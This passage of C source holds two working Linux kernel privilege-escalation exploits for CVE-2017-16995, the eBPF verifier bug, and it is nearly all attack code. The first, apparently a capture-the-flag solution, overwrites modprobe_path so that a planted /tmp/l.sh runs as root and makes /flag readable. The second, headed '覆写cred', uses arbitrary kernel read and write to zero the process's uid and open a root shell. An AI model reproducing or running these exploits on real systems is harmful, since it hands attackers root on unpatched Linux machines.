#define BPF_LD_MAP_FD(DST, MAP_FD)                \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)


/* Memory load, dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)            \
    ((struct bpf_insn) {                    \
        .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = 0 })

/* Memory store of an immediate, *(uint *) (dst_reg + off16) = imm32 */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)            \
    ((struct bpf_insn) {                    \
        .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = 0 })

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */
#define BPF_JMP_IMM(OP, DST, IMM, OFF)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_JMP | BPF_OP(OP) | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Raw code statement block */
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)            \
    ((struct bpf_insn) {                    \
        .code  = CODE,                    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Program exit instruction. */
#define BPF_EXIT_INSN()                        \
    ((struct bpf_insn) {                    \
        .code  = BPF_JMP | BPF_EXIT,            \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = 0 })

/*
 * Four-instruction prologue: load 0xFFFFFFFF into r2 with a 32-bit move,
 * jump over the next two instructions if r2 != 0xFFFFFFFF, otherwise set
 * r0 = 0 and exit.
 */
#define BPF_BYPASS_CHECK()                                                       \
    BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),               \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),     \
    BPF_MOV64_IMM(BPF_REG_0, 0),                         \
    BPF_EXIT_INSN()                                     

/*
 * Emit the instruction sequence that looks up element `idx` of the map held
 * in r9 and loads its 64-bit value into register `dst`. r0 is left holding
 * the pointer returned by the lookup; the program exits if that pointer is 0.
 * Despite the name, this fetches a map value, not a descriptor.
 */
#define BPF_GET_MAP_FD(idx, dst)                                                                    \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),        /* r1 = r9 (map) */                                 \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),       /* r2 = fp */                                       \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),      /* r2 = fp - 4 (address of the key) */              \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),     /* *(u32 *)(fp - 4) = idx */                        \
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),                              \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),      /* if (r0 != 0) skip the exit below */              \
    BPF_EXIT_INSN(),                                                                                \
    BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0)      /* dst = *(u64 *)r0 = map[idx] */

/*
 * Build the instruction array and load it as a socket filter.
 *
 * The program reads three map slots (0 = op, 1 = addr, 2 = value) and then
 * dispatches on op: op == 1 copies the 8 bytes at fp+0x28 into map[2]; any
 * other op stores r8 (value) at the address in r7 (addr).
 *
 * Returns whatever bpf_prog_load() returns.
 */
static int load_prog() {
    struct bpf_insn prog[] = {
        BPF_BYPASS_CHECK(),

        BPF_LD_MAP_FD(BPF_REG_9, mapfd),        /* r9 = map */

        BPF_GET_MAP_FD(0, BPF_REG_6),       /* r6 = map[0] = op */
        BPF_GET_MAP_FD(1, BPF_REG_7),       /* r7 = map[1] = addr */
        BPF_GET_MAP_FD(2, BPF_REG_8),       /* r8 = map[2] = value; r0 = &map[2] */

        BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0 = &map[2] */
        BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0 as the exit value */

        /* op == 1: map[2] = *(u64 *)(fp + 0x28) */
        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),              /* if (op != 1) skip the next three insns */
        BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_10, 0x28),   /* r3 = *(u64 *)(fp + 0x28) */
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),        /* *r2 = r3, i.e. map[2] = r3 */
        BPF_EXIT_INSN(),

        /* any other op: write */
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                            /* *r7 = r8 */
        BPF_EXIT_INSN(),
    };

    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}

/* Print a "[+] "-prefixed printf-style progress message on stdout. */
void Output(const char *fmt, ...){
    va_list ap;

    fputs("[+] ", stdout);
    va_start(ap, fmt);
    vfprintf(stdout, fmt, ap);
    va_end(ap);
}

/* Print a "[-] "-prefixed printf-style detail message on stdout. */
void print(const char *fmt, ...){
    va_list ap;

    fputs("[-] ", stdout);
    va_start(ap, fmt);
    vfprintf(stdout, fmt, ap);
    va_end(ap);
}

/*
 * Set up everything the later commands rely on: create the 3-entry array
 * map, load the program, create a datagram socket pair and attach the
 * program to sockets[1]. Any failure is reported through Err(), which exits.
 */
void init_bpf()
{
    Output("CVE-2017-16995\n");

    Output("bpf create map\n");
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
    if(mapfd < 0 ){
        Err("bpf map create Error\n");
    }

    Output("load prog\n");
    progfd = load_prog();
    if(progfd < 0 ){
        /* Capture errno before any stdio call gets a chance to overwrite it. */
        int load_errno = errno;

        if(load_errno == EACCES){
            print("bpf_log_buf: %s\n", bpf_log_buf);
        }
        Err("Load progd Error: %s\n", strerror(load_errno));
    }

    Output("socket pair\n");
    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)){
        Err("create socket pair Error %s\n", strerror(errno));
    }

    Output("set sockopt\n");
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0){
        Err("setsockopt %s\n", strerror(errno));
    }
}

/*
 * Send the global buffer over sockets[0]. A failed write is reported with
 * perror(); a partial write is reported on stderr. Neither is fatal.
 */
static void write_msg(){
    const ssize_t sent = write(sockets[0], buffer, sizeof(buffer));

    if(sent < 0){
        perror("Write");
    } else if((size_t) sent != sizeof(buffer)){
        fprintf(stderr, "short write: %zd\n", sent);
    }
}

/* Store value in slot key of the global map; exits through Err() on failure. */
static void update_elem(int key, unsigned long value){
    int rc = bpf_update_elem(mapfd, &key, &value, 0);

    if(rc != 0){
        Err("bpf_update_elem error %s\n", strerror(errno));
    }
}

/* Read slot key of the global map and return it; exits through Err() on failure. */
static unsigned long get_value(int key){
    unsigned long slot;
    int rc = bpf_lookup_elem(mapfd, &key, &slot);

    if(rc != 0){
        Err("bpf_lookup_elem %s\n", strerror(errno));
    }
    return slot;
}

/*
 * Run one command: place op, addr and value in map slots 0, 1 and 2, send a
 * message through the socket pair, then return the contents of slot 2.
 */
static unsigned long sendcmd(unsigned long op, unsigned long addr, unsigned long value){
    const unsigned long slots[3] = { op, addr, value };
    int idx;

    for(idx = 0; idx < 3; idx++){
        update_elem(idx, slots[idx]);
    }

    write_msg();

    return get_value(2);
}

/*
 * Issue command 1, treat the returned value as an address 0x7272bc bytes
 * above the kernel base, and convert the global modprobe_path from an offset
 * into an absolute address. Because it rewrites modprobe_path in place, it
 * must be called only once.
 */
void leak_kernel(){
    Output("leak_kernel:\n");
    size_t kernel_addr = sendcmd(1, 0, 0);
    kernel_base = kernel_addr - 0x7272bc;
    modprobe_path = kernel_base + modprobe_path;
    /* %zx is the conversion that matches size_t arguments. */
    print("kernel_base: 0x%zx\n", kernel_base);
    print("modprobe_path: 0x%zx\n", modprobe_path);
}

/*
 * Write the 10 bytes "/tmp/l.sh\0" at the address in modprobe_path using two
 * 8-byte write commands. Op code 3 is used; load_prog() treats every op
 * other than 1 as a write.
 */
void write_mod(){
    const size_t path_lo = 0x732e6c2f706d742f;   /* "/tmp/l.s" as little-endian bytes */
    const size_t path_hi = 0x0068;               /* "h" followed by NUL bytes */

    sendcmd(3, modprobe_path, path_lo);
    sendcmd(3, modprobe_path + 8, path_hi);
}

/*
 * Create the two helper files through the shell: /tmp/l.sh (a script that
 * chmods /flag) and /tmp/ll (four 0xff bytes), both marked executable.
 * Results of system() are not checked.
 */
void init_sh(){
    static const char *const setup_cmds[] = {
        "echo -ne '#!/bin/sh\n/bin/chmod 777 /flag\n' > /tmp/l.sh",
        "chmod +x /tmp/l.sh",
        "echo -ne '\\xff\\xff\\xff\\xff' > /tmp/ll",
        "chmod +x /tmp/ll",
    };
    size_t i;

    for(i = 0; i < sizeof(setup_cmds) / sizeof(setup_cmds[0]); i++){
        system(setup_cmds[i]);
    }
}

/* Run the steps in order: helper files, BPF setup, leak, write, trigger, read. */
int main(){
    init_sh();
    init_bpf();

    leak_kernel();
    write_mod();

    system("/tmp/ll");
    system("cat /flag");

    return EXIT_SUCCESS;
}

覆写cred:

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>

/* Payload written to sockets[0] by write_msg(); never filled in, so it stays zeroed. */
char buffer[64];
/* Pair created by socketpair(); the BPF program is attached to sockets[1]. */
int sockets[2];
/* Descriptors returned by bpf_create_map() and load_prog(). */
int mapfd, progfd;
/* Not referenced anywhere in this program. */
int doredact = 0;

/* Added to the task pointer in exp() to locate the cred pointer. */
size_t cred_offset = 0x9b8;
/* Added to the cred pointer in exp() to get the address that is overwritten. */
size_t uid_offset = 4;

/* Size of the verifier log buffer passed to BPF_PROG_LOAD. */
#define LOG_BUF_SIZE 65536
/* Lower bound used by exp() to sanity-check the task pointer it reads. */
#define PHYS_OFFSET 0xffff880000000000
char bpf_log_buf[LOG_BUF_SIZE];

/*
 * Print a "[!] "-prefixed printf-style message on stdout, then terminate the
 * process with exit status 1. Does not return.
 */
void Err(const char *fmt, ...){
    va_list ap;

    fputs("[!] ", stdout);
    va_start(ap, fmt);
    vfprintf(stdout, fmt, ap);
    va_end(ap);

    exit(1);
}

/* Convert a pointer to the 64-bit integer form stored in union bpf_attr fields. */
static __u64 ptr_to_u64(void *ptr)
{
    unsigned long raw = (unsigned long) ptr;

    return (__u64) raw;
}

/*
 * Thin wrapper around the BPF_PROG_LOAD command of the bpf() syscall.
 *
 * prog_type    - program type to load.
 * insns        - instruction array.
 * prog_len     - size of insns in BYTES (converted to an instruction count here).
 * license      - NUL-terminated license string.
 * kern_version - value stored in attr.kern_version.
 *
 * Verifier output is requested at log level 1 into the global bpf_log_buf.
 * Returns the raw syscall() result: a descriptor on success, -1 with errno
 * set on failure.
 */
int bpf_prog_load(enum bpf_prog_type prog_type,
          const struct bpf_insn *insns, int prog_len,
          const char *license, int kern_version)
{
    union bpf_attr attr;

    /* Clear the whole union explicitly: a brace initializer only guarantees
     * the named member is initialized, not the remaining bytes of the union. */
    memset(&attr, 0, sizeof(attr));

    attr.prog_type = prog_type;
    attr.insns = ptr_to_u64((void *) insns);
    attr.insn_cnt = prog_len / sizeof(struct bpf_insn);
    attr.license = ptr_to_u64((void *) license);
    attr.log_buf = ptr_to_u64(bpf_log_buf);
    attr.log_size = LOG_BUF_SIZE;
    attr.log_level = 1;
    attr.kern_version = kern_version;

    /* Start from an empty log so stale text is never printed. */
    bpf_log_buf[0] = 0;

    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

/*
 * Thin wrapper around the BPF_MAP_CREATE command of the bpf() syscall.
 *
 * map_type, key_size, value_size and max_entries are copied into the
 * attribute block. map_flags is accepted for signature compatibility but is
 * not passed to the kernel.
 *
 * Returns the raw syscall() result: a map descriptor on success, -1 with
 * errno set on failure.
 */
int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
           int max_entries, int map_flags)
{
    union bpf_attr attr;

    (void) map_flags;

    /* Clear the whole union explicitly: a brace initializer only guarantees
     * the named member is initialized, not the remaining bytes of the union. */
    memset(&attr, 0, sizeof(attr));

    attr.map_type = map_type;
    attr.key_size = key_size;
    attr.value_size = value_size;
    attr.max_entries = max_entries;

    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

/*
 * Thin wrapper around the BPF_MAP_UPDATE_ELEM command of the bpf() syscall.
 *
 * fd    - map descriptor.
 * key   - pointer to the key.
 * value - pointer to the value to store.
 * flags - passed through in attr.flags.
 *
 * Returns the raw syscall() result (0 on success, -1 with errno set).
 */
int bpf_update_elem(int fd, void *key, void *value, unsigned long long flags)
{
    union bpf_attr attr;

    /* Clear the whole union explicitly: a brace initializer only guarantees
     * the named member is initialized, not the remaining bytes of the union. */
    memset(&attr, 0, sizeof(attr));

    attr.map_fd = fd;
    attr.key = ptr_to_u64(key);
    attr.value = ptr_to_u64(value);
    attr.flags = flags;

    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

/*
 * Thin wrapper around the BPF_MAP_LOOKUP_ELEM command of the bpf() syscall.
 *
 * fd    - map descriptor.
 * key   - pointer to the key to look up.
 * value - buffer that receives the element's value.
 *
 * Returns the raw syscall() result (0 on success, -1 with errno set).
 */
int bpf_lookup_elem(int fd, void *key, void *value)
{
    union bpf_attr attr;

    /* Clear the whole union explicitly: a brace initializer only guarantees
     * the named member is initialized, not the remaining bytes of the union. */
    memset(&attr, 0, sizeof(attr));

    attr.map_fd = fd;
    attr.key = ptr_to_u64(key);
    attr.value = ptr_to_u64(value);

    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

/*
 * Instruction-building macros. Each one expands to a struct bpf_insn
 * compound literal (BPF_LD_IMM64_RAW expands to two of them), so they are
 * meant to be used as comma-separated elements of an instruction array.
 */

/* 64-bit ALU operation OP on DST with a 32-bit immediate operand. */
#define BPF_ALU64_IMM(OP, DST, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,    \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

/* 64-bit register-to-register move: DST = SRC. */
#define BPF_MOV64_REG(DST, SRC)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_MOV | BPF_X,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = 0 })

/* 32-bit register-to-register move (BPF_ALU class). */
#define BPF_MOV32_REG(DST, SRC)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_X,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = 0 })

/* Move of a 32-bit immediate using the BPF_ALU64 class. */
#define BPF_MOV64_IMM(DST, IMM)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU64 | BPF_MOV | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

/* Move of a 32-bit immediate using the BPF_ALU (32-bit) class. */
#define BPF_MOV32_IMM(DST, IMM)                    \
    ((struct bpf_insn) {                    \
        .code  = BPF_ALU | BPF_MOV | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = IMM })

/* 64-bit immediate load with src_reg = 0; see BPF_LD_IMM64_RAW. */
#define BPF_LD_IMM64(DST, IMM)                    \
    BPF_LD_IMM64_RAW(DST, 0, IMM)

/* Two-slot 64-bit immediate load: the first instruction carries the low
 * 32 bits of IMM, the second (all other fields zero) the high 32 bits. */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_LD | BPF_DW | BPF_IMM,        \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = 0,                    \
        .imm   = (__u32) (IMM) }),            \
    ((struct bpf_insn) {                    \
        .code  = 0,                     \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = ((__u64) (IMM)) >> 32 })

/* Fallback for headers that do not define the pseudo source-register value. */
#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD    1
#endif

/* 64-bit immediate load of MAP_FD with src_reg = BPF_PSEUDO_MAP_FD. */
#define BPF_LD_MAP_FD(DST, MAP_FD)                \
    BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)


/* Memory load, dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)            \
    ((struct bpf_insn) {                    \
        .code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = 0 })

/* Memory store of an immediate, *(uint *) (dst_reg + off16) = imm32 */
#define BPF_ST_MEM(SIZE, DST, OFF, IMM)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)            \
    ((struct bpf_insn) {                    \
        .code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = 0 })

/* Conditional jumps against immediates, if (dst_reg 'op' imm32) goto pc + off16 */
#define BPF_JMP_IMM(OP, DST, IMM, OFF)                \
    ((struct bpf_insn) {                    \
        .code  = BPF_JMP | BPF_OP(OP) | BPF_K,        \
        .dst_reg = DST,                    \
        .src_reg = 0,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Raw code statement block */
#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)            \
    ((struct bpf_insn) {                    \
        .code  = CODE,                    \
        .dst_reg = DST,                    \
        .src_reg = SRC,                    \
        .off   = OFF,                    \
        .imm   = IMM })

/* Program exit instruction. */
#define BPF_EXIT_INSN()                        \
    ((struct bpf_insn) {                    \
        .code  = BPF_JMP | BPF_EXIT,            \
        .dst_reg = 0,                    \
        .src_reg = 0,                    \
        .off   = 0,                    \
        .imm   = 0 })

/*
 * Four-instruction prologue: load 0xFFFFFFFF into r2 with a 32-bit move,
 * jump over the next two instructions if r2 != 0xFFFFFFFF, otherwise set
 * r0 = 0 and exit.
 */
#define BPF_BYPASS_CHECK()                                                       \
    BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),               \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),     \
    BPF_MOV64_IMM(BPF_REG_0, 0),                         \
    BPF_EXIT_INSN()                                     

/*
 * Emit the instruction sequence that looks up element `idx` of the map held
 * in r9 and loads its 64-bit value into register `dst`. r0 is left holding
 * the pointer returned by the lookup; the program exits if that pointer is 0.
 * Despite the name, this fetches a map value, not a descriptor.
 */
#define BPF_GET_MAP_FD(idx, dst)                                                                    \
    BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),        /* r1 = r9 (map) */                                 \
    BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),       /* r2 = fp */                                       \
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),      /* r2 = fp - 4 (address of the key) */              \
    BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),     /* *(u32 *)(fp - 4) = idx */                        \
    BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),                              \
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),      /* if (r0 != 0) skip the exit below */              \
    BPF_EXIT_INSN(),                                                                                \
    BPF_LDX_MEM(BPF_DW, dst, BPF_REG_0, 0)      /* dst = *(u64 *)r0 = map[idx] */

/*
 * Build the instruction array and load it as a socket filter.
 *
 * The program reads three map slots (0 = op, 1 = addr, 2 = value) and then
 * dispatches on op: 0 stores the frame pointer r10 into map[2]; 1 copies the
 * 8 bytes at addr into map[2]; any other op stores value at addr.
 *
 * Returns whatever bpf_prog_load() returns.
 */
static int load_prog() {
    struct bpf_insn prog[] = {
        BPF_BYPASS_CHECK(),

        BPF_LD_MAP_FD(BPF_REG_9, mapfd),        /* r9 = map */

        BPF_GET_MAP_FD(0, BPF_REG_6),       /* r6 = map[0] = op */
        BPF_GET_MAP_FD(1, BPF_REG_7),       /* r7 = map[1] = addr */
        BPF_GET_MAP_FD(2, BPF_REG_8),       /* r8 = map[2] = value; r0 = &map[2] */

        BPF_MOV64_REG(BPF_REG_2, BPF_REG_0),               /* r2 = r0 = &map[2] */
        BPF_MOV64_IMM(BPF_REG_0, 0),                       /* r0 = 0 as the exit value */

        /* op == 0: map[2] = fp */
        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 2),                /* if (op != 0) skip the next two insns */
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_10, 0),        /* *r2 = r10, i.e. map[2] = fp */
        BPF_EXIT_INSN(),

        /* op == 1: read */
        BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 1, 3),            /* if (op != 1) skip the next three insns */
        BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_7, 0x0),   /* r3 = *(u64 *)r7 */
        BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_3, 0),        /* *r2 = r3, i.e. map[2] = r3 */
        BPF_EXIT_INSN(),

        /* any other op: write */
        BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),                            /* *r7 = r8 */
        BPF_EXIT_INSN(),
    };

    return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog), "GPL", 0);
}

/* Print a "[+] "-prefixed printf-style progress message on stdout. */
void Output(const char *fmt, ...){
    va_list ap;

    fputs("[+] ", stdout);
    va_start(ap, fmt);
    vfprintf(stdout, fmt, ap);
    va_end(ap);
}

/* Print a "[-] "-prefixed printf-style detail message on stdout. */
void print(const char *fmt, ...){
    va_list ap;

    fputs("[-] ", stdout);
    va_start(ap, fmt);
    vfprintf(stdout, fmt, ap);
    va_end(ap);
}

/*
 * Set up everything the later commands rely on: create the 3-entry array
 * map, load the program, create a datagram socket pair and attach the
 * program to sockets[1]. Any failure is reported through Err(), which exits.
 */
void init_bpf()
{
    Output("CVE-2017-16995\n");

    Output("bpf create map\n");
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
    if(mapfd < 0 ){
        Err("bpf map create Error\n");
    }

    Output("load prog\n");
    progfd = load_prog();
    if(progfd < 0 ){
        /* Capture errno before any stdio call gets a chance to overwrite it. */
        int load_errno = errno;

        if(load_errno == EACCES){
            print("bpf_log_buf: %s\n", bpf_log_buf);
        }
        Err("Load progd Error: %s\n", strerror(load_errno));
    }

    Output("socket pair\n");
    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)){
        Err("create socket pair Error %s\n", strerror(errno));
    }

    Output("set sockopt\n");
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0){
        Err("setsockopt %s\n", strerror(errno));
    }
}

/*
 * Send the global buffer over sockets[0]. A failed write is reported with
 * perror(); a partial write is reported on stderr. Neither is fatal.
 */
static void write_msg(){
    const ssize_t sent = write(sockets[0], buffer, sizeof(buffer));

    if(sent < 0){
        perror("Write");
    } else if((size_t) sent != sizeof(buffer)){
        fprintf(stderr, "short write: %zd\n", sent);
    }
}

/* Store value in slot key of the global map; exits through Err() on failure. */
static void update_elem(int key, unsigned long value){
    int rc = bpf_update_elem(mapfd, &key, &value, 0);

    if(rc != 0){
        Err("bpf_update_elem error %s\n", strerror(errno));
    }
}

/* Read slot key of the global map and return it; exits through Err() on failure. */
static unsigned long get_value(int key){
    unsigned long slot;
    int rc = bpf_lookup_elem(mapfd, &key, &slot);

    if(rc != 0){
        Err("bpf_lookup_elem %s\n", strerror(errno));
    }
    return slot;
}

/*
 * Run one command: place op, addr and value in map slots 0, 1 and 2, send a
 * message through the socket pair, then return the contents of slot 2.
 */
static unsigned long sendcmd(unsigned long op, unsigned long addr, unsigned long value){
    const unsigned long slots[3] = { op, addr, value };
    int idx;

    for(idx = 0; idx < 3; idx++){
        update_elem(idx, slots[idx]);
    }

    write_msg();

    return get_value(2);
}

/*
 * Drive the loaded program through its three commands:
 *   op 0 - fetch the frame pointer value and round it down to a 0x4000
 *          boundary to get the thread_info address;
 *   op 1 - read the task pointer stored there, then the cred pointer at
 *          task + cred_offset;
 *   op 2 - write 8 zero bytes at cred + uid_offset.
 * If getuid() then reports 0, run `id`, start /bin/sh and exit with status 0;
 * otherwise return without printing anything further.
 *
 * NOTE(review): this function shares its name with exp() from <math.h>;
 * compilers may warn about the conflicting declaration.
 */
void exp(){
    /* size_t values are printed with %zx, the conversion matching their type. */
    size_t stack_addr = sendcmd(0, 0, 0);
    print("stack_addr: 0x%zx\n", stack_addr);

    size_t ti_addr = (stack_addr)& ~(0x4000-1);
    print("ti_addr: 0x%zx\n", ti_addr);

    size_t task_addr = sendcmd(1, ti_addr, 0);

    if (task_addr < PHYS_OFFSET)
        Err("bogus task ptr\n");

    print("task_addr: 0x%zx\n", task_addr);

    size_t cred_addr = task_addr + cred_offset;

    size_t cred = sendcmd(1, cred_addr, 0);
    printf("cred: 0x%zx\n", cred);

    size_t uid_addr = cred + uid_offset;
    printf("uid_addr: 0x%zx\n", uid_addr);

    sendcmd(2, uid_addr, 0);

    if(!getuid()){
        print("You are root now\n");
        system("id");
        system("/bin/sh");
        exit(0);
    }
}

/* Set up the BPF objects, then run the command sequence in exp(). */
int main(){
    init_bpf();

    exp();

    return EXIT_SUCCESS;
}